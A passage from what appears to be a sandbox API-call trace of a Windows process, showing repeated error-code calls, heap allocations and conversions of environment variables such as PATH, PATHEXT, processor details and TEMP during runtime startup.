0x0 [0100.735] SetLastError (dwErrCode=0x0) [0100.735] GetLastError () returned 0x0 [0100.735] SetLastError (dwErrCode=0x0) [0100.736] GetLastError () returned 0x0 [0100.736] SetLastError (dwErrCode=0x0) [0100.736] GetLastError () returned 0x0 [0100.736] SetLastError (dwErrCode=0x0) [0100.736] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11178) returned 0x2c [0100.736] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11178, Size=0x30) returned 0xa11178 [0100.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.736] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x18) returned 0xa111b0 [0100.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0xa111b0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0100.736] GetLastError () returned 0x0 [0100.736] SetLastError (dwErrCode=0x0) [0100.736] GetLastError () returned 0x0 [0100.736] SetLastError (dwErrCode=0x0) [0100.736] GetLastError () returned 0x0 [0100.736] SetLastError (dwErrCode=0x0) [0100.736] GetLastError () returned 0x0 [0100.736] SetLastError (dwErrCode=0x0) [0100.736] GetLastError () returned 0x0 [0100.736] SetLastError (dwErrCode=0x0) [0100.736] GetLastError () returned 0x0 [0100.736] SetLastError (dwErrCode=0x0) [0100.736] GetLastError () returned 0x0 [0100.737] SetLastError (dwErrCode=0x0) [0100.737] GetLastError () returned 0x0 [0100.737] SetLastError (dwErrCode=0x0) [0100.737] GetLastError () returned 0x0 [0100.737] SetLastError (dwErrCode=0x0) [0100.737] GetLastError () returned 0x0 [0100.737] SetLastError (dwErrCode=0x0) [0100.737] GetLastError () returned 0x0 [0100.737] SetLastError (dwErrCode=0x0) [0100.737] GetLastError () returned 0x0 [0100.737] SetLastError (dwErrCode=0x0) [0100.737] GetLastError () returned 0x0 [0100.737] SetLastError (dwErrCode=0x0) [0100.737] GetLastError () returned 0x0 [0100.737] SetLastError (dwErrCode=0x0) [0100.737] GetLastError () returned 0x0 [0100.737] SetLastError (dwErrCode=0x0) [0100.737] GetLastError () returned 0x0 [0100.737] SetLastError (dwErrCode=0x0) [0100.737] GetLastError () returned 0x0 [0100.737] SetLastError (dwErrCode=0x0) [0100.737] GetLastError () returned 0x0 [0100.737] SetLastError (dwErrCode=0x0) [0100.738] GetLastError () returned 0x0 [0100.738] SetLastError (dwErrCode=0x0) [0100.738] GetLastError () returned 0x0 [0100.738] SetLastError (dwErrCode=0x0) [0100.738] GetLastError () returned 0x0 [0100.738] SetLastError (dwErrCode=0x0) [0100.738] GetLastError () returned 0x0 [0100.738] SetLastError (dwErrCode=0x0) [0100.738] GetLastError () returned 0x0 [0100.738] SetLastError (dwErrCode=0x0) [0100.738] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11178) returned 0x30 [0100.738] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11178, Size=0x34) returned 0xa111d0 [0100.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0100.738] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x17) returned 0xa11178 [0100.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0xa11178, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0100.738] GetLastError () returned 0x0 [0100.738] SetLastError (dwErrCode=0x0) [0100.738] GetLastError () returned 0x0 [0100.738] SetLastError (dwErrCode=0x0) [0100.738] GetLastError () returned 0x0 [0100.738] SetLastError (dwErrCode=0x0) [0100.738] GetLastError () returned 0x0 [0100.738] SetLastError (dwErrCode=0x0) [0100.739] GetLastError () returned 0x0 [0100.739] SetLastError (dwErrCode=0x0) [0100.739] GetLastError () returned 0x0 [0100.739] SetLastError (dwErrCode=0x0) [0100.739] GetLastError () returned 0x0 [0100.739] SetLastError (dwErrCode=0x0) [0100.739] GetLastError () returned 0x0 [0100.739] SetLastError (dwErrCode=0x0) [0100.739] GetLastError () returned 0x0 [0100.739] SetLastError (dwErrCode=0x0) [0100.739] GetLastError () returned 0x0 [0100.739] SetLastError (dwErrCode=0x0) [0100.739] GetLastError () returned 0x0 [0100.739] SetLastError (dwErrCode=0x0) [0100.739] GetLastError () returned 0x0 [0100.739] SetLastError (dwErrCode=0x0) [0100.739] GetLastError () returned 0x0 [0100.739] SetLastError (dwErrCode=0x0) [0100.739] GetLastError () returned 0x0 [0100.739] SetLastError (dwErrCode=0x0) [0100.739] GetLastError () returned 0x0 [0100.739] SetLastError (dwErrCode=0x0) [0100.740] GetLastError () returned 0x0 [0100.740] SetLastError (dwErrCode=0x0) [0100.740] GetLastError () returned 0x0 [0100.740] SetLastError (dwErrCode=0x0) [0100.740] GetLastError () returned 0x0 [0100.740] SetLastError (dwErrCode=0x0) [0100.740] GetLastError () returned 0x0 [0100.740] SetLastError (dwErrCode=0x0) [0100.740] GetLastError () returned 0x0 [0100.740] SetLastError (dwErrCode=0x0) [0100.740] GetLastError () returned 0x0 [0100.740] SetLastError (dwErrCode=0x0) [0100.740] GetLastError () returned 0x0 [0100.740] SetLastError (dwErrCode=0x0) [0100.740] GetLastError () returned 0x0 [0100.740] SetLastError (dwErrCode=0x0) [0100.740] GetLastError () returned 0x0 [0100.740] SetLastError (dwErrCode=0x0) [0100.740] GetLastError () returned 0x0 [0100.740] SetLastError (dwErrCode=0x0) [0100.740] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa111d0) returned 0x34 [0100.740] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa111d0, Size=0x38) returned 0xa111d0 [0100.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.740] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0xe) returned 0xa0e5e0 [0100.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0xa0e5e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0100.741] GetLastError () returned 0x0 [0100.741] SetLastError (dwErrCode=0x0) [0100.741] GetLastError () returned 0x0 [0100.741] SetLastError (dwErrCode=0x0) [0100.741] GetLastError () returned 0x0 [0100.741] SetLastError (dwErrCode=0x0) [0100.741] GetLastError () returned 0x0 [0100.741] SetLastError (dwErrCode=0x0) [0100.741] GetLastError () returned 0x0 [0100.741] SetLastError (dwErrCode=0x0) [0100.741] GetLastError () returned 0x0 [0100.741] SetLastError (dwErrCode=0x0) [0100.741] GetLastError () returned 0x0 [0100.741] SetLastError (dwErrCode=0x0) [0100.741] GetLastError () returned 0x0 [0100.741] SetLastError (dwErrCode=0x0) [0100.741] GetLastError () returned 0x0 [0100.741] SetLastError (dwErrCode=0x0) [0100.741] GetLastError () returned 0x0 [0100.741] SetLastError (dwErrCode=0x0) [0100.741] GetLastError () returned 0x0 [0100.741] SetLastError (dwErrCode=0x0) [0100.741] GetLastError () returned 0x0 [0100.741] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.742] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.742] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.742] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.742] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.742] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.742] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.742] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.742] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.742] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.742] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.742] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.742] SetLastError (dwErrCode=0x0) [0100.742] GetLastError () returned 0x0 [0100.743] SetLastError (dwErrCode=0x0) [0100.743] GetLastError () returned 0x0 [0100.743] SetLastError (dwErrCode=0x0) [0100.743] GetLastError () returned 0x0 [0100.743] SetLastError (dwErrCode=0x0) [0100.743] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa111d0) returned 0x38 [0100.743] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa111d0, Size=0x3c) returned 0xa111d0 [0100.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0100.743] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x69) returned 0xa11218 [0100.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0xa11218, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0100.743] GetLastError () returned 0x0 [0100.743] SetLastError (dwErrCode=0x0) [0100.743] GetLastError () returned 0x0 [0100.743] SetLastError (dwErrCode=0x0) [0100.743] GetLastError () returned 0x0 [0100.743] SetLastError (dwErrCode=0x0) [0100.743] GetLastError () returned 0x0 [0100.743] SetLastError (dwErrCode=0x0) [0100.743] GetLastError () returned 0x0 [0100.743] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa111d0) returned 0x3c [0100.743] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa111d0, Size=0x40) returned 0xa111d0 [0100.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0100.743] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x3e) returned 0xa04ff8 [0100.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0xa04ff8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0100.744] GetLastError () returned 0x0 [0100.744] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa111d0) returned 0x40 [0100.744] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa111d0, Size=0x44) returned 0xa11290 [0100.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0100.744] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x1b) returned 0xa0ee98 [0100.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0xa0ee98, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0100.744] GetLastError () returned 0x0 [0100.744] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11290) returned 0x44 [0100.744] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11290, Size=0x48) returned 0xa11290 [0100.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0100.744] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x1d) returned 0xa0eec0 [0100.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0xa0eec0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0100.744] GetLastError () returned 0x0 [0100.744] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11290) returned 0x48 [0100.744] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11290, Size=0x4c) returned 0xa11290 [0100.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0100.744] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x48) returned 0xa06b00 [0100.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0xa06b00, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0100.744] GetLastError () returned 0x0 [0100.744] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11290) returned 0x4c [0100.744] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11290, Size=0x50) returned 0xa11290 [0100.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.744] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x12) returned 0xa111d0 [0100.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0xa111d0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0100.744] GetLastError () returned 0x0 [0100.744] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11290) returned 0x50 [0100.745] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11290, Size=0x54) returned 0xa11290 [0100.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.745] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x18) returned 0xa111f0 [0100.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0xa111f0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0100.745] GetLastError () returned 0x0 [0100.745] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11290) returned 0x54 [0100.745] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11290, Size=0x58) returned 0xa11290 [0100.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0100.745] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x1b) returned 0xa0eee8 [0100.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0xa0eee8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0100.745] GetLastError () returned 0x0 [0100.745] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11290) returned 0x58 [0100.745] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11290, Size=0x5c) returned 0xa11290 [0100.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0100.745] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x24) returned 0xa0a990 [0100.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0xa0a990, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0100.745] GetLastError () returned 0x0 [0100.745] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11290) returned 0x5c [0100.745] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11290, Size=0x60) returned 0xa11290 [0100.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0100.745] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x29) returned 0xa0b0a0 [0100.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0xa0b0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0100.745] GetLastError () returned 0x0 [0100.745] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11290) returned 0x60 [0100.745] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11290, Size=0x64) returned 0xa11290 [0100.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0100.745] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x1e) returned 0xa0ef10 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0xa0ef10, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0100.746] GetLastError () returned 0x0 [0100.746] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11290) returned 0x64 [0100.746] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11290, Size=0x68) returned 0xa11290 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0100.746] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x41) returned 0xa06b50 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0xa06b50, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0100.746] GetLastError () returned 0x0 [0100.746] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11290) returned 0x68 [0100.746] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11290, Size=0x6c) returned 0xa11290 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0100.746] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x17) returned 0xa11308 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0xa11308, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0100.746] GetLastError () returned 0x0 [0100.746] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11290) returned 0x6c [0100.746] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11290, Size=0x70) returned 0xa11290 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.746] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0xf) returned 0xa0e5f8 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0xa0e5f8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0100.746] GetLastError () returned 0x0 [0100.746] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11290) returned 0x70 [0100.746] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11290, Size=0x74) returned 0xa11328 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0100.746] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x16) returned 0xa11290 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0xa11290, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0100.746] GetLastError () returned 0x0 [0100.747] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11328) returned 0x74 [0100.747] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11328, Size=0x78) returned 0xa11328 [0100.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0100.747] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x2a) returned 0xa0b0d8 [0100.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0xa0b0d8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0100.747] GetLastError () returned 0x0 [0100.747] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11328) returned 0x78 [0100.747] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11328, Size=0x7c) returned 0xa11328 [0100.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0100.747] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x29) returned 0xa0b110 [0100.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0xa0b110, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0100.747] GetLastError () returned 0x0 [0100.747] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11328) returned 